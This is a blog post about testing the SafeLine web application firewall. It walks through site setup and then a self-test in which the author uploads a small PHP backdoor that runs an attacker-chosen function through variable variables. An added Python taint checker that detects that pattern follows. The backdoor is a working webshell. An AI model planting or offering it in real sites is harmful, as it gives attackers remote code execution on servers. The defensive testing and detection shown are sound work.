Real-World Attack Testing with SafeLine: A Guide to Dynamic Protection
Lulu
Posted on August 28, 2024
1. Introduction to SafeLine
Since 2016, Chaitin Tech has been committed to making cybersecurity accessible to everyone. They initially open-sourced SafeLine's semantic analysis engine and have since released various plugins and communication protocols associated with SafeLine. In April 2023, Chaitin took it a step further by launching a free community edition of SafeLine on GitHub. This move allows more developers and companies to experience the power of SafeLine’s semantic analysis algorithms at zero cost, aiming to advance the development and application of intelligent semantic analysis in cybersecurity.
2. Experiencing Dynamic Protection
Introduction to Dynamic Protection
The Dynamic Protection feature is a significant update to SafeLine WAF, designed to offer more flexible and efficient security defenses. It provides comprehensive protection for web applications by monitoring traffic in real time and dynamically adjusting protection strategies.
Adding Protected Sites
After logging in, navigate to "Web Services" and click "Add Web Service."
Enter the domain and port to be monitored, and in the upstream server field, input the internal address of your web server.
Configuring Dynamic Protection Resources
Before and After Protection
Dynamic Protection Review
As shown above, once you select the resources to protect, SafeLine informs you that the site is now protected by WAF. The original code on the page is replaced with obfuscated code, enhancing security significantly.
3. Attack Testing (Disclaimer: This was tested on my own site.)
Step 1: Constructing the Attack Code
I created a backdoor script that passes variables multiple times. Normally, this code wouldn't trigger any alarms. I then uploaded it via the web to see if SafeLine would detect it:
<?php
$username = $_POST['username'];
$password = $_POST['password'];
$shell = "username";
$variable = $password;
@$$shell($variable);
?>
Step 2: Upload Test
It quickly became clear that my upload operation failed. A quick check revealed that SafeLine had intercepted the upload.
Step 3: Backend Check
In the SafeLine dashboard, I could see that my site was under attack. The protection was solid, clearly marking the attacker's IP, logging the attack details, and even providing AI analysis options.
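The script in Step 1 never names a dangerous function directly: $$shell resolves through the literal "username" to $username, so both the function name and its argument come from the POST body. The following is an added example, not code from the original post and not SafeLine's detection logic. It is a small line-based taint check that flags this pattern in uploaded PHP. The function and sample names are hypothetical, and it is a regex heuristic rather than a full PHP parser.

```python
import re

# Request-controlled PHP superglobals treated as taint sources.
SOURCE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|FILES)\b")
ASSIGN = re.compile(r"\$(\w+)\s*=(?![=>])\s*([^;]+);")
STRING_LIT = re.compile(r'''^(['"])(\w+)\1$''')
VAR = re.compile(r"\$(\w+)")
# A call whose callee is a variable ($f(...)) or a variable variable ($$f(...)).
DYN_CALL = re.compile(r"(\${1,2})(\w+)\s*\(")


def find_tainted_dynamic_calls(php_source):
    """Return (line, call expression, tainted variable) for each dynamic call
    whose function name can be traced back to request input."""
    tainted, literal, findings = set(), {}, []
    for line_no, line in enumerate(php_source.splitlines(), 1):
        # Check calls first, using the state built from earlier lines.
        for sigils, name in DYN_CALL.findall(line):
            # $$shell with $shell = "username" really calls $username.
            target = literal.get(name) if sigils == "$$" else name
            if target in tainted:
                findings.append((line_no, sigils + name, target))
            elif sigils == "$$" and name in tainted:
                findings.append((line_no, sigils + name, name))
        for m in ASSIGN.finditer(line):
            name, rhs = m.group(1), m.group(2).strip()
            tainted.discard(name)      # a reassignment replaces the old state
            literal.pop(name, None)
            lit = STRING_LIT.match(rhs)
            if lit:
                literal[name] = lit.group(2)
            elif SOURCE.search(rhs) or any(v in tainted for v in VAR.findall(rhs)):
                tainted.add(name)      # propagate taint through the copy
    return findings


# The upload from Step 1 of the post.
SAMPLE_UPLOAD = """<?php
$username = $_POST['username'];
$password = $_POST['password'];
$shell = "username";
$variable = $password;
@$$shell($variable);
?>"""

# Constructed benign sample: the callee is a fixed literal, only the argument is user input.
BENIGN_UPLOAD = """<?php
$handler = "strtoupper";
$name = $_POST['name'];
echo $handler($name);
?>"""

if __name__ == "__main__":
    for line_no, expr, var in find_tainted_dynamic_calls(SAMPLE_UPLOAD):
        print(f"line {line_no}: {expr}() is called with a name taken from ${var}")
```

The benign sample produces no finding because only the argument is request-controlled, which keeps the check focused on attacker-chosen function names rather than every dynamic call.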
4. Relevant Links
Official Website: https://waf.chaitin.com
GitHub: https://github.com/chaitin/SafeLine